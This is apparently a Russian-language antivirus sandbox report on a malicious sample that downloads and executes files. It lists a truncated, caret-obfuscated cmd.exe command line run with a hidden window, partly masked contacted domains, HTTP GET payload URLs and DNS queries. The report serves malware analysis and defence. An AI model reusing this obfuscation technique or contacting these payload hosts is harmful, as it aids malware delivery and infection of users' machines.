Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' cVHBkRdDmjzK jHafSTupIRSVBqWrKLvA pYaPbEK & %co^m^S^p^E^c% /c ^Cm^D; ; ; ; /V^:^o ; ;; /R " ;; ( ( (^S^e^t ^9C=C^f V7 2w ^Be^ d^S^ 8O V^D^ fw^ SL Bn ^kw q^u ^hl^ ^E^Z ^0L QS^ ^5^7 ^FR}N...
Сетевая активность
Подключается к
- 'dv###aninov.ru':80
- 'dv###aninov.ru':443
- 'th####etulsa.com':80
TCP
Запросы HTTP GET
- http://www.dv###aninov.ru/tUFSGD
- http://th####etulsa.com/Pb
Другие
- 'dv###aninov.ru':443
UDP
- DNS ASK ga######raybasketbol.com
- DNS ASK cv#####usahaberkah.com
- DNS ASK dv###aninov.ru
- DNS ASK 2.####alengine.ru
- DNS ASK th####etulsa.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' cVHBkRdDmjzK jHafSTupIRSVBqWrKLvA pYaPbEK & %co^m^S^p^E^c% /c ^Cm^D; ; ; ; /V^:^o ; ;; /R " ;; ( ( (^S^e^t ^9C=C^f V7 2w ^Be^ d^S^ 8O V^D^ fw^ SL Bn ^kw q^u ^hl^ ^E^Z ^0L QS^ ^5^7 ^FR}N...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ; ; ; ; /V:o ; ;; /R " ;; ( ( (^S^e^t ^9C=C^f V7 2w ^Be^ d^S^ 8O V^D^ fw^ SL Bn ^kw q^u ^hl^ ^E^Z ^0L QS^ ^5^7 ^FR}Na^}^Lo^{8Q^hMT^c3^St^37a^y^1cLl}9R;^aNk^j^Ua3R^ejFrZub3c;96^bJGXtQ^Co7$^...
